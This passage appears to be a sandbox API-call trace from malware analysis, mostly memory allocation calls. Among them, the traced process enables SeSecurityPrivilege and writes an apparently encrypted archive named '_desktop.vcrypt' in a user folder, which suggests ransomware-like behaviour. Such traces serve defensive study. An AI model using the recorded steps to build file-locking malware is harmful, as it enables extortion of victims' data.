0x1c85178 [0058.156] free (_Block=0x1c85128) [0058.156] malloc (_Size=0xc) returned 0x1c83cb8 [0058.156] malloc (_Size=0x48) returned 0x1c85128 [0058.156] free (_Block=0x1c85178) [0058.156] malloc (_Size=0x8) returned 0x27d7b0 [0058.156] malloc (_Size=0x3c) returned 0x1c84058 [0058.156] free (_Block=0x27d7b0) [0058.156] malloc (_Size=0x3c) returned 0x1c840a0 [0058.156] free (_Block=0x1c84058) [0058.156] malloc (_Size=0xc) returned 0x1c83cd0 [0058.156] malloc (_Size=0x3c) returned 0x1c84058 [0058.156] free (_Block=0x1c840a0) [0058.157] malloc (_Size=0x8) returned 0x27d7b0 [0058.157] malloc (_Size=0x22) returned 0x1c83490 [0058.157] free (_Block=0x27d7b0) [0058.157] malloc (_Size=0x22) returned 0x1c834c0 [0058.157] free (_Block=0x1c83490) [0058.157] malloc (_Size=0xc) returned 0x1c83ce8 [0058.157] malloc (_Size=0x22) returned 0x1c83490 [0058.157] free (_Block=0x1c834c0) [0058.157] malloc (_Size=0x8) returned 0x27d7b0 [0058.157] malloc (_Size=0x2e) returned 0x1c85178 [0058.157] free (_Block=0x27d7b0) [0058.157] malloc (_Size=0x2e) returned 0x1c851b0 [0058.157] free (_Block=0x1c85178) [0058.157] malloc (_Size=0xc) returned 0x1c83d00 [0058.157] malloc (_Size=0x2e) returned 0x1c85178 [0058.157] free (_Block=0x1c851b0) [0058.157] malloc (_Size=0x8) returned 0x27d7b0 [0058.157] malloc (_Size=0x1c) returned 0x1c82b60 [0058.157] free (_Block=0x27d7b0) [0058.157] malloc (_Size=0x1c) returned 0x1c82b88 [0058.157] free (_Block=0x1c82b60) [0058.157] malloc (_Size=0xc) returned 0x1c83d18 [0058.157] malloc (_Size=0x1c) returned 0x1c82b60 [0058.157] free (_Block=0x1c82b88) [0058.157] malloc (_Size=0x8) returned 0x27d7b0 [0058.158] malloc (_Size=0x32) returned 0x1c851b0 [0058.158] free (_Block=0x27d7b0) [0058.158] malloc (_Size=0x32) returned 0x1c851f0 [0058.158] free (_Block=0x1c851b0) [0058.158] malloc (_Size=0xc) returned 0x1c83d30 [0058.158] malloc (_Size=0x32) returned 0x1c851b0 [0058.158] free (_Block=0x1c851f0) [0058.158] malloc (_Size=0x8) returned 0x27d7b0 [0058.158] malloc (_Size=0x22) returned 0x1c834c0 [0058.158] free (_Block=0x27d7b0) [0058.158] malloc (_Size=0x22) returned 0x1c834f0 [0058.158] free (_Block=0x1c834c0) [0058.158] malloc (_Size=0xc) returned 0x1c83d48 [0058.158] malloc (_Size=0x22) returned 0x1c834c0 [0058.158] free (_Block=0x1c834f0) [0058.158] malloc (_Size=0x8) returned 0x27d7b0 [0058.158] malloc (_Size=0x28) returned 0x1c834f0 [0058.158] free (_Block=0x27d7b0) [0058.158] malloc (_Size=0x28) returned 0x1c83520 [0058.158] free (_Block=0x1c834f0) [0058.158] malloc (_Size=0xc) returned 0x1c83d60 [0058.158] malloc (_Size=0x28) returned 0x1c834f0 [0058.158] free (_Block=0x1c83520) [0058.158] malloc (_Size=0x8) returned 0x27d7b0 [0058.158] malloc (_Size=0x28) returned 0x1c83520 [0058.158] free (_Block=0x27d7b0) [0058.158] malloc (_Size=0x28) returned 0x1c83550 [0058.159] free (_Block=0x1c83520) [0058.159] malloc (_Size=0xc) returned 0x1c83d78 [0058.159] malloc (_Size=0x28) returned 0x1c83520 [0058.159] free (_Block=0x1c83550) [0058.159] malloc (_Size=0x8) returned 0x27d7b0 [0058.159] malloc (_Size=0x24) returned 0x1c83550 [0058.159] free (_Block=0x27d7b0) [0058.159] malloc (_Size=0x24) returned 0x1c83580 [0058.159] free (_Block=0x1c83550) [0058.159] malloc (_Size=0xc) returned 0x1c83d90 [0058.159] malloc (_Size=0x24) returned 0x1c83550 [0058.159] free (_Block=0x1c83580) [0058.159] free (_Block=0x0) [0058.159] malloc (_Size=0xa0) returned 0x1c851f0 [0058.159] malloc (_Size=0x10) returned 0x1c83da8 [0058.159] free (_Block=0x0) [0058.159] malloc (_Size=0x20) returned 0x1c82b88 [0058.159] free (_Block=0x1c83da8) [0058.159] malloc (_Size=0x30) returned 0x1c85298 [0058.159] free (_Block=0x1c82b88) [0058.159] malloc (_Size=0x40) returned 0x1c840a0 [0058.159] free (_Block=0x1c85298) [0058.159] malloc (_Size=0x60) returned 0x1c85298 [0058.160] free (_Block=0x1c840a0) [0058.160] malloc (_Size=0x80) returned 0x1c85300 [0058.160] free (_Block=0x1c85298) [0058.160] malloc (_Size=0xb0) returned 0x1c85388 [0058.160] free (_Block=0x1c85300) [0058.160] malloc (_Size=0xe0) returned 0x1c85298 [0058.160] free (_Block=0x1c85388) [0058.160] malloc (_Size=0x120) returned 0x1c85388 [0058.160] free (_Block=0x1c85298) [0058.160] malloc (_Size=0x170) returned 0x1c854b0 [0058.160] free (_Block=0x1c85388) [0058.160] malloc (_Size=0x1d0) returned 0x1c85298 [0058.160] free (_Block=0x1c854b0) [0058.160] malloc (_Size=0x250) returned 0x1c85470 [0058.160] free (_Block=0x1c85298) [0058.160] malloc (_Size=0x2f0) returned 0x1c856c8 [0058.160] free (_Block=0x1c85470) [0058.160] malloc (_Size=0x280) returned 0x1c85298 [0058.160] free (_Block=0x1c856c8) [0058.160] free (_Block=0x1c83550) [0058.161] free (_Block=0x1c83d90) [0058.161] free (_Block=0x1c83520) [0058.161] free (_Block=0x1c83d78) [0058.161] free (_Block=0x1c834f0) [0058.161] free (_Block=0x1c83d60) [0058.161] free (_Block=0x1c834c0) [0058.161] free (_Block=0x1c83d48) [0058.161] free (_Block=0x1c851b0) [0058.161] free (_Block=0x1c83d30) [0058.161] free (_Block=0x1c82b60) [0058.161] free (_Block=0x1c83d18) [0058.161] free (_Block=0x1c85178) [0058.161] free (_Block=0x1c83d00) [0058.161] free (_Block=0x1c83490) [0058.161] free (_Block=0x1c83ce8) [0058.161] free (_Block=0x1c84058) [0058.161] free (_Block=0x1c83cd0) [0058.161] free (_Block=0x1c85128) [0058.161] free (_Block=0x1c83cb8) [0058.161] free (_Block=0x1c850d8) [0058.161] free (_Block=0x1c83ca0) [0058.161] free (_Block=0x1c85078) [0058.161] free (_Block=0x1c83c88) [0058.161] free (_Block=0x1c83460) [0058.161] free (_Block=0x1c83c70) [0058.161] free (_Block=0x1c85038) [0058.161] free (_Block=0x1c83c58) [0058.161] free (_Block=0x1c84010) [0058.161] free (_Block=0x1c83c40) [0058.161] free (_Block=0x1c84fe8) [0058.161] free (_Block=0x1c83c28) [0058.161] free (_Block=0x1c82068) [0058.162] free (_Block=0x1c83c10) [0058.162] free (_Block=0x1c83f20) [0058.162] free (_Block=0x1c83bf8) [0058.162] free (_Block=0x1c810a0) [0058.162] free (_Block=0x1c83be0) [0058.162] free (_Block=0x1c84fb0) [0058.162] free (_Block=0x1c83bc8) [0058.162] free (_Block=0x1c83fc8) [0058.162] free (_Block=0x1c83bb0) [0058.162] free (_Block=0x1c80380) [0058.162] free (_Block=0x1c83b98) [0058.162] free (_Block=0x1c83ed8) [0058.162] free (_Block=0x1c83b80) [0058.162] free (_Block=0x1c828d8) [0058.162] free (_Block=0x1c83b68) [0058.162] free (_Block=0x1c82898) [0058.162] free (_Block=0x1c83b50) [0058.162] free (_Block=0x1c82aa0) [0058.162] free (_Block=0x1c83b38) [0058.162] free (_Block=0x1c833d0) [0058.162] free (_Block=0x1c83b20) [0058.162] free (_Block=0x1c833a0) [0058.162] free (_Block=0x1c83b08) [0058.162] free (_Block=0x1c82b38) [0058.162] free (_Block=0x1c83af0) [0058.162] free (_Block=0x1c82b10) [0058.162] free (_Block=0x27f5b0) [0058.162] free (_Block=0x1c80360) [0058.162] free (_Block=0x27f640) [0058.162] free (_Block=0x1c80220) [0058.163] free (_Block=0x27f628) [0058.163] free (_Block=0x1c810d8) [0058.163] free (_Block=0x27f4d8) [0058.163] free (_Block=0x1c812f0) [0058.163] free (_Block=0x27f598) [0058.163] free (_Block=0x1c82a30) [0058.163] free (_Block=0x27f5f8) [0058.163] free (_Block=0x1c801c0) [0058.163] free (_Block=0x27f5e0) [0058.163] free (_Block=0x1c800c0) [0058.163] free (_Block=0x27f5c8) [0058.163] free (_Block=0x1c80580) [0058.163] free (_Block=0x27f580) [0058.163] free (_Block=0x1c83370) [0058.163] free (_Block=0x27f568) [0058.163] free (_Block=0x1c83310) [0058.163] free (_Block=0x27f400) [0058.163] free (_Block=0x1c83a30) [0058.163] free (_Block=0x0) [0058.163] free (_Block=0x0) [0058.163] free (_Block=0x1c851f0) [0058.163] malloc (_Size=0x14) returned 0x1c80580 [0058.163] free (_Block=0x0) [0058.163] malloc (_Size=0x28) returned 0x1c83310 [0058.163] free (_Block=0x1c80580) [0058.163] malloc (_Size=0x3c) returned 0x1c83fc8 [0058.163] free (_Block=0x1c83310) [0058.163] malloc (_Size=0x50) returned 0x1c82068 [0058.163] free (_Block=0x1c83fc8) [0058.164] malloc (_Size=0x78) returned 0x1c810a0 [0058.164] free (_Block=0x1c82068) [0058.164] malloc (_Size=0xa0) returned 0x1c83a30 [0058.164] free (_Block=0x1c810a0) [0058.164] malloc (_Size=0xdc) returned 0x1c84fb0 [0058.164] free (_Block=0x1c83a30) [0058.164] malloc (_Size=0x118) returned 0x1c85098 [0058.164] free (_Block=0x1c84fb0) [0058.164] malloc (_Size=0x168) returned 0x1c85520 [0058.164] free (_Block=0x1c85098) [0058.164] malloc (_Size=0x1cc) returned 0x1c84fb0 [0058.164] free (_Block=0x1c85520) [0058.164] malloc (_Size=0x244) returned 0x1c85520 [0058.164] free (_Block=0x1c84fb0) [0058.164] malloc (_Size=0x2e4) returned 0x1c85770 [0058.164] free (_Block=0x1c85520) [0058.164] malloc (_Size=0x3ac) returned 0x1c85a60 [0058.164] free (_Block=0x1c85770) [0058.164] malloc (_Size=0x320) returned 0x1c85520 [0058.165] free (_Block=0x1c85a60) [0058.165] free (_Block=0x1c85298) [0058.165] fputs (in: _Str="Add new data to archive", _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.166] fputs (in: _Str=": ", _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.166] fputs (in: _Str="4 folders, 36 files, 2787806 bytes (2723 KiB)", _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.167] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0058.168] free (_Block=0x1c83fc8) [0058.168] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0058.169] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x22f0e4 | out: TokenHandle=0x22f0e4*=0x80) returned 1 [0058.169] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x22f0d8 | out: lpLuid=0x22f0d8*(LowPart=0x8, HighPart=0)) returned 1 [0058.169] AdjustTokenPrivileges (in: TokenHandle=0x80, DisableAllPrivileges=0, NewState=0x22f0d4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0058.169] GetLastError () returned 0x0 [0058.169] CloseHandle (hObject=0x80) returned 1 [0058.170] malloc (_Size=0x8) returned 0x1c80ab0 [0058.170] malloc (_Size=0x84) returned 0x1c83a30 [0058.170] malloc (_Size=0x84) returned 0x1c84fb0 [0058.170] free (_Block=0x1c83a30) [0058.170] malloc (_Size=0x8) returned 0x1c80bf0 [0058.170] malloc (_Size=0x84) returned 0x1c83a30 [0058.170] free (_Block=0x1c80ab0) [0058.170] malloc (_Size=0x48) returned 0x1c82aa0 [0058.170] free (_Block=0x1c80bf0) [0058.170] free (_Block=0x1c82aa0) [0058.170] free (_Block=0x1c84fb0) [0058.170] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 0x10 [0058.170] free (_Block=0x1c83a30) [0058.170] malloc (_Size=0x20) returned 0x1c82b10 [0058.170] malloc (_Size=0x8) returned 0x1c80bf0 [0058.170] malloc (_Size=0x84) returned 0x1c83a30 [0058.170] malloc (_Size=0x84) returned 0x1c84fb0 [0058.170] free (_Block=0x1c83a30) [0058.170] malloc (_Size=0x84) returned 0x1c83a30 [0058.170] free (_Block=0x1c80bf0) [0058.170] free (_Block=0x1c84fb0) [0058.170] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\5p5nrgjn0js halpmcxz_desktop.vcrypt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0058.172] malloc (_Size=0xc) returned 0x27f400 [0058.172] malloc (_Size=0x84) returned 0x1c84fb0 [0058.172] malloc (_Size=0x4) returned 0x1c80bf0 [0058.172] free (_Block=0x0) [0058.172] free (_Block=0x1c83a30) [0058.172] malloc (_Size=0x14) returned 0x1c80580 [0058.172] malloc (_Size=0x6) returned 0x1c80ab0 [0058.172] malloc (_Size=0xc) returned 0x27f568 [0058.172] malloc (_Size=0x6) returned 0x1c80ad0 [0058.172] malloc (_Size=0x4) returned 0x1c80ac0 [0058.172] free (_Block=0x0) [0058.172] free (_Block=0x1c80ab0) [0058.172] malloc (_Size=0x4) returned 0x1c80ab0 [0058.172] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x22f028, lpSystemAffinityMask=0x22f02c | out: lpProcessAffinityMask=0x22f028, lpSystemAffinityMask=0x22f02c) returned 1 [0058.172] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0058.173] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatusEx") returned 0x76d6d4c4 [0058.173] GlobalMemoryStatusEx (in: lpBuffer=0x22efd0 | out: lpBuffer=0x22efd0) returned 1 [0058.173] malloc (_Size=0x6) returned 0x1c80af0 [0058.173] malloc (_Size=0x6) returned 0x1c80a80 [0058.173] malloc (_Size=0x6) returned 0x1c80c00 [0058.173] malloc (_Size=0x22) returned 0x1c83310 [0058.173] malloc (_Size=0x24) returned 0x1c83370 [0058.173] malloc (_Size=0x18) returned 0x1c800c0 [0058.174] malloc (_Size=0x12) returned 0x1c801c0 [0058.174] malloc (_Size=0x18) returned 0x1c80220 [0058.174] malloc (_Size=0x2a) returned 0x1c82a30 [0058.174] malloc (_Size=0x2c) returned 0x1c812f0 [0058.174] malloc (_Size=0x2a) returned 0x1c812f0 [0058.174] malloc (_Size=0x14) returned 0x1c80220 [0058.175] malloc (_Size=0x16) returned 0x1c80380 [0058.175] malloc (_Size=0x1e) returned 0x1c82b60 [0058.175] malloc (_Size=0x1c) returned 0x1c82b88 [0058.175] malloc (_Size=0x26) returned 0x1c83370 [0058.175] malloc (_Size=0x22) returned 0x1c83460 [0058.175] malloc (_Size=0x3e) returned 0x1c843b8 [0058.176] malloc (_Size=0x38) returned 0x1c83a80 [0058.176] malloc (_Size=0x3e) returned 0x1c84520 [0058.176] malloc (_Size=0x40) returned 0x1c84400 [0058.176] malloc (_Size=0x14) returned 0x1c80600 [0058.176] malloc (_Size=0x40) returned 0x1c84688 [0058.176] malloc (_Size=0x2e) returned 0x1c812f0 [0058.176] malloc (_Size=0x30) returned 0x1c812f0 [0058.177] malloc (_Size=0x56) returned 0x1c850a8 [0058.177] malloc (_Size=0x4c) returned 0x1c820c0 [0058.177] malloc (_Size=0x44) returned 0x1c85040 [0058.177] malloc (_Size=0x3a) returned 0x1c84838 [0058.177] malloc (_Size=0x34) returned 0x1c83a90 [0058.177] malloc (_Size=0x24) returned 0x1c83490 [0058.178] malloc (_Size=0x54) returned 0x1c851e8 [0058.178] malloc (_Size=0x44) returned 0x1c851e8 [0058.178] malloc (_Size=0x48) returned 0x1c85168 [0058.178] malloc (_Size=0x3c) returned 0x1c84a30 [0058.178] malloc (_Size=0x22) returned 0x1c834c0 [0058.178] malloc (_Size=0x2e) returned 0x1c812f0 [0058.179] malloc (_Size=0x1c) returned 0x1c82c50 [0058.179] malloc (_Size=0x32) returned 0x1c83a90 [0058.179] malloc (_Size=0x22) returned 0x1c834f0 [0058.179] malloc (_Size=0x28) returned 0x1c83520 [0058.179] malloc (_Size=0x28) returned 0x1c83550 [0058.179] malloc (_Size=0x24) returned 0x1c83580 [0058.179] malloc (_Size=0x18) returned 0x1c80660 [0058.180] free (_Block=0x1c80af0) [0058.180] free (_Block=0x1c80c00) [0058.180] free (_Block=0x1c80620) [0058.180] free (_Block=0x1c80600) [0058.180] free (_Block=0x1c80c10) [0058.180] free (_Block=0x1c83580) [0058.180] free (_Block=0x1c80a80) [0058.180] malloc (_Size=0x4) returned 0x1c80a80 [0058.180] malloc (_Size=0x8) returned 0x1c80c10 [0058.180] malloc (_Size=0x5) returned 0x1c80c00 [0058.180] free (_Block=0x1c80a80) [0058.180] malloc (_Size=0x18) returned 0x1c80600 [0058.180] malloc (_Size=0x4) returned 0x1c80a80 [0058.180] free (_Block=0x0) [0058.180] strlen (_Str="BT2") returned 0x3 [0058.180] malloc (_Size=0x18) returned 0x1c80620 [0058.180] malloc (_Size=0x8) returned 0x1c80af0 [0058.180] free (_Block=0x1c80a80) [0058.180] malloc (_Size=0x18) returned 0x1c80680 [0058.180] malloc (_Size=0xc) returned 0x27f580 [0058.180] free (_Block=0x1c80af0) [0058.180] malloc (_Size=0x18) returned 0x1c806c0 [0058.180] malloc (_Size=0x10) returned 0x27f568 [0058.180] free (_Block=0x27f580) [0058.180] malloc (_Size=0x18) returned 0x1c806e0 [0058.180] malloc (_Size=0x18) returned 0x1c80700 [0058.180] free (_Block=0x27f568) [0058.180] malloc (_Size=0x20) returned 0x1c82c78 [0058.180] malloc (_Size=0x4) returned 0x1c80af0 [0058.180] free (_Block=0x0) [0058.181] malloc (_Size=0x14) returned 0x1c80720 [0058.181] free (_Block=0x0) [0058.181] malloc (_Size=0x18) returned 0x1c80740 [0058.181] malloc (_Size=0x18) returned 0x1c80760 [0058.181] malloc (_Size=0x18) returned 0x1c80780 [0058.181] malloc (_Size=0x18) returned 0x1c807a0 [0058.181] malloc (_Size=0x18) returned 0x1c807c0 [0058.181] free (_Block=0x1c80c10) [0058.181] free (_Block=0x1c80c00) [0058.181] free (_Block=0x1c806e0) [0058.181] free (_Block=0x1c806c0) [0058.181] free (_Block=0x1c80680) [0058.181] free (_Block=0x1c80620) [0058.181] free (_Block=0x1c80600) [0058.181] free (_Block=0x1c80700) [0058.181] malloc (_Size=0x4e) returned 0x1c820c0 [0058.181] free (_Block=0x1c80ac0) [0058.181] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x230000 [0058.182] GetTickCount () returned 0x1146b70 [0058.182] strlen (_Str="0") returned 0x1 [0058.182] fputs (in: _Str=" 0%", _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.183] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.183] malloc (_Size=0x38) returned 0x1c83a90 [0058.183] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xc4 [0058.183] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xc8 [0058.183] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xcc [0058.183] malloc (_Size=0x38) returned 0x1c852f8 [0058.183] malloc (_Size=0x10) returned 0x27f568 [0058.183] free (_Block=0x0) [0058.183] malloc (_Size=0x18) returned 0x1c80700 [0058.183] malloc (_Size=0x4) returned 0x1c80ac0 [0058.183] free (_Block=0x0) [0058.183] malloc (_Size=0x4) returned 0x1c80c00 [0058.183] free (_Block=0x0) [0058.183] malloc (_Size=0x8) returned 0x1c80c10 [0058.183] free (_Block=0x1c80c00) [0058.183] malloc (_Size=0xc) returned 0x27f580 [0058.183] free (_Block=0x1c80c10) [0058.183] malloc (_Size=0x10) returned 0x27f5c8 [0058.183] free (_Block=0x27f580) [0058.184] malloc (_Size=0x18) returned 0x1c80600 [0058.184] free (_Block=0x27f5c8) [0058.184] malloc (_Size=0x20) returned 0x1c82ca0 [0058.184] free (_Block=0x1c80600) [0058.184] malloc (_Size=0x2c) returned 0x1c812f0 [0058.184] free (_Block=0x1c82ca0) [0058.184] malloc (_Size=0x38) returned 0x1c85338 [0058.184] free (_Block=0x1c812f0) [0058.184] malloc (_Size=0x48) returned 0x1c85460 [0058.184] free (_Block=0x1c85338) [0058.184] malloc (_Size=0x5c) returned 0x1c854b0 [0058.184] free (_Block=0x1c85460) [0058.184] malloc (_Size=0x74) returned 0x1c85848 [0058.184] free (_Block=0x1c854b0) [0058.184] malloc (_Size=0x94) returned 0x1c85460 [0058.184] free (_Block=0x1c85848) [0058.184] free (_Block=0x0) [0058.184] WriteFile (in: hFile=0x80, lpBuffer=0x22ea70*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x22ea04, lpOverlapped=0x0 | out: lpBuffer=0x22ea70*, lpNumberOfBytesWritten=0x22ea04*=0x8, lpOverlapped=0x0) returned 1 [0058.185] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x22ea48*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x22ea48*=0) returned 0x8 [0058.185] WriteFile (in: hFile=0x80, lpBuffer=0x22ea78*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x22ea0c, lpOverlapped=0x0 | out: lpBuffer=0x22ea78*, lpNumberOfBytesWritten=0x22ea0c*=0x18, lpOverlapped=0x0) returned 1 [0058.185] malloc (_Size=0x4) returned 0x1c80c10 [0058.185] free (_Block=0x0) [0058.186] malloc (_Size=0x8) returned 0x1c80c00 [0058.186] free (_Block=0x1c80c10) [0058.186] malloc (_Size=0xc) returned 0x27f5c8 [0058.186] free (_Block=0x1c80c00) [0058.186] malloc (_Size=0x10) returned 0x27f580 [0058.186] free (_Block=0x27f5c8) [0058.186] malloc (_Size=0x8) returned 0x1c80c00 [0058.186] malloc (_Size=0x22) returned 0x1c83580 [0058.186] free (_Block=0x1c80c00) [0058.186] malloc (_Size=0x1) returned 0x1c80c00 [0058.186] free (_Block=0x0) [0058.186] malloc (_Size=0x1) returned 0x1c80c10 [0058.186] free (_Block=0x0) [0058.186] malloc (_Size=0x1) returned 0x1c80a80 [0058.186] free (_Block=0x0) [0058.186] malloc (_Size=0x8) returned 0x1c80c30 [0058.186] free (_Block=0x0) [0058.186] malloc (_Size=0x1) returned 0x27fb60 [0058.186] free (_Block=0x0) [0058.186] malloc (_Size=0x1) returned 0x27fb70 [0058.186] free (_Block=0x0) [0058.186] malloc (_Size=0x4) returned 0x27fb90 [0058.186] free (_Block=0x0) [0058.186] malloc (_Size=0x1) returned 0x27fba0 [0058.186] free (_Block=0x0) [0058.186] malloc (_Size=0xc) returned 0x27f5c8 [0058.186] malloc (_Size=0x22) returned 0x1c835b0 [0058.186] malloc (_Size=0x4) returned 0x27fb40 [0058.187] free (_Block=0x0) [0058.187] malloc (_Size=0x10) returned 0x27f5e0 [0058.187] free (_Block=0x0) [0058.187] free (_Block=0x1c83580) [0058.187] malloc (_Size=0x8) returned 0x27fb80 [0058.187] malloc (_Size=0x14) returned 0x1c80600 [0058.187] free (_Block=0x27fb80) [0058.187] malloc (_Size=0x2) returned 0x27fb80 [0058.187] free (_Block=0x1c80c00) [0058.187] malloc (_Size=0x2) returned 0x1c80c00 [0058.187] free (_Block=0x1c80c10) [0058.187] malloc (_Size=0x2) returned 0x1c80c10 [0058.187] free (_Block=0x1c80a80) [0058.187] malloc (_Size=0x10) returned 0x27f5f8 [0058.187] free (_Block=0x1c80c30) [0058.187] malloc (_Size=0x2) returned 0x1c80c30 [0058.187] free (_Block=0x27fb60) [0058.187] malloc (_Size=0x2) returned 0x27fb60 [0058.187] free (_Block=0x27fb70) [0058.187] malloc (_Size=0x8) returned 0x27fb70 [0058.187] free (_Block=0x27fb90) [0058.187] malloc (_Size=0x2) returned 0x27fb90 [0058.187] free (_Block=0x27fba0) [0058.188] malloc (_Size=0xc) returned 0x27f598 [0058.188] malloc (_Size=0x14) returned 0x1c80620 [0058.188] malloc (_Size=0x8) returned 0x27fba0 [0058.188] free (_Block=0x27fb40) [0058.188] malloc (_Size=0x20) returned 0x1c82ca0 [0058.188] free (_Block=0x27f5e0) [0058.188] free (_Block=0x1c80600) [0058.188] malloc (_Size=0x8) returned 0x27fb40 [0058.188] malloc (_Size=0x30) returned 0x1c812f0 [0058.188] free (_Block=0x27fb40) [0058.188] malloc (_Size=0x3) returned 0x27fb40 [0058.188] free (_Block=0x27fb80) [0058.188] malloc (_Size=0x3) returned 0x27fb80 [0058.188] free (_Block=0x1c80c00) [0058.188] malloc (_Size=0x3) returned 0x1c80c00 [0058.188] free (_Block=0x1c80c10) [0058.188] malloc (_Size=0x18) returned 0x1c80600 [0058.188] free (_Block=0x27f5f8) [0058.188] malloc (_Size=0x3) returned 0x1c80c10 [0058.188] free (_Block=0x1c80c30) [0058.188] malloc (_Size=0x3) returned 0x1c80c30 [0058.188] free (_Block=0x27fb60) [0058.188] malloc (_Size=0xc) returned 0x27f5f8 [0058.188] free (_Block=0x27fb70) [0058.188] malloc (_Size=0x3) returned 0x27fb70 [0058.189] free (_Block=0x27fb90) [0058.189] malloc (_Size=0xc) returned 0x27f5e0 [0058.189] malloc (_Size=0x30) returned 0x1c85338 [0058.189] malloc (_Size=0xc) returned 0x27f4d8 [0058.189] free (_Block=0x27fba0) [0058.189] malloc (_Size=0x30) returned 0x1c85848 [0058.189] free (_Block=0x1c82ca0) [0058.189] free (_Block=0x1c812f0) [0058.189] malloc (_Size=0x8) returned 0x27fba0 [0058.189] malloc (_Size=0x24) returned 0x1c83580 [0058.189] free (_Block=0x27fba0) [0058.189] malloc (_Size=0x4) returned 0x27fba0 [0058.189] free (_Block=0x27fb40) [0058.189] malloc (_Size=0x4) returned 0x27fb40 [0058.189] free (_Block=0x27fb80) [0058.189] malloc (_Size=0x4) returned 0x27fb80 [0058.189] free (_Block=0x1c80c00) [0058.189] malloc (_Size=0x20) returned 0x1c82ca0 [0058.189] free (_Block=0x1c80600) [0058.189] malloc (_Size=0x4) returned 0x1c80c00 [0058.189] free (_Block=0x1c80c10) [0058.189] malloc (_Size=0x4) returned 0x1c80c10 [0058.190] free (_Block=0x1c80c30) [0058.190] malloc (_Size=0x10) returned 0x27f628 [0058.190] free (_Block=0x27f5f8) [0058.190] malloc (_Size=0x4) returned 0x1c80c30 [0058.190] free (_Block=0x27fb70) [0058.190] malloc (_Size=0xc) returned 0x27f5f8 [0058.190] malloc (_Size=0x24) returned 0x1c835e0 [0058.190] malloc (_Size=0x10) returned 0x27f640 [0058.190] free (_Block=0x27f4d8) [0058.190] malloc (_Size=0x40) returned 0x1c84cb8 [0058.190] free (_Block=0x1c85848) [0058.190] free (_Block=0x1c83580) [0058.190] free (_Block=0x27f580) [0058.190] malloc (_Size=0x4) returned 0x27fb70 [0058.190] malloc (_Size=0x20) returned 0x1c82cc8 [0058.190] malloc (_Size=0x8) returned 0x27fb90 [0058.190] malloc (_Size=0x18) returned 0x1c80600 [0058.190] malloc (_Size=0x18) returned 0x1c80680 [0058.190] malloc (_Size=0x4e) returned 0x1c82118 [0058.190] malloc (_Size=0x8) returned 0x27fb60 [0058.190] malloc (_Size=0x4) returned 0x27fbc0 [0058.190] free (_Block=0x0) [0058.190] malloc (_Size=0x20) returned 0x1c82cf0 [0058.190] malloc (_Size=0x8) returned 0x27fbd0 [0058.191] malloc (_Size=0x18) returned 0x1c806c0 [0058.191] malloc (_Size=0x18) returned 0x1c806e0 [0058.191] malloc (_Size=0x4e) returned 0x1c82170 [0058.191] free (_Block=0x27fb60) [0058.191] free (_Block=0x0) [0058.191] malloc (_Size=0x2d0) returned 0x1c85848 [0058.191] malloc (_Size=0x90) returned 0x1c85b20 [0058.191] GetTickCount () returned 0x1146b70 [0058.191] malloc (_Size=0x60) returned 0x1c85bb8 [0058.191] free (_Block=0x0) [0058.191] malloc (_Size=0x1) returned 0x27fb60 [0058.191] free (_Block=0x0) [0058.191] malloc (_Size=0x4) returned 0x27fbe0 [0058.191] free (_Block=0x0) [0058.191] malloc (_Size=0x8) returned 0x27fbf0 [0058.191] malloc (_Size=0x18) returned 0x1c807e0 [0058.191] malloc (_Size=0x4) returned 0x27fc00 [0058.191] free (_Block=0x0) [0058.191] malloc (_Size=0x4) returned 0x27fc10 [0058.191] free (_Block=0x0) [0058.192] malloc (_Size=0x4) returned 0x27fc20 [0058.192] free (_Block=0x0) [0058.192] malloc (_Size=0x4) returned 0x27fb50 [0058.192] free (_Block=0x0) [0058.192] malloc (_Size=0x4) returned 0x27fbb0 [0058.192] free (_Block=0x0) [0058.192] free (_Block=0x0) [0058.192] malloc (_Size=0x1) returned 0x27fc30 [0058.192] free (_Block=0x27fc30) [0058.192] malloc (_Size=0x8) returned 0x27fc30 [0058.192] free (_Block=0x0) [0058.192] malloc (_Size=0x20) returned 0x1c82d18 [0058.192] malloc (_Size=0x8) returned 0x27fc60 [0058.192] free (_Block=0x27fbc0) [0058.192] malloc (_Size=0x8) returned 0x27fbc0 [0058.192] free (_Block=0x27fc20) [0058.192] free (_Block=0x0) [0058.192] malloc (_Size=0x8) returned 0x27fc20 [0058.192] free (_Block=0x0) [0058.192] malloc (_Size=0x10) returned 0x27f580 [0058.193] free 